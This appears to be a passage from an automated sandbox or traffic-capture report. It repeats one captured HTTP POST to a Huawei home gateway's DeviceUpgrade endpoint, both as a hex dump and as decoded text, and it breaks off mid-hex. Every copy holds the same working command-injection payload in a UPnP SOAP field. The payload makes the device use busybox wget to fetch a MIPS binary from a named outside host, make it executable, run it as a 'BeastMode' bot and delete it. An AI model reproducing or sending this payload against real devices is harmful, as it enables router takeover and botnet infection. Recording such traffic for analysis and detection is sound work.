20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 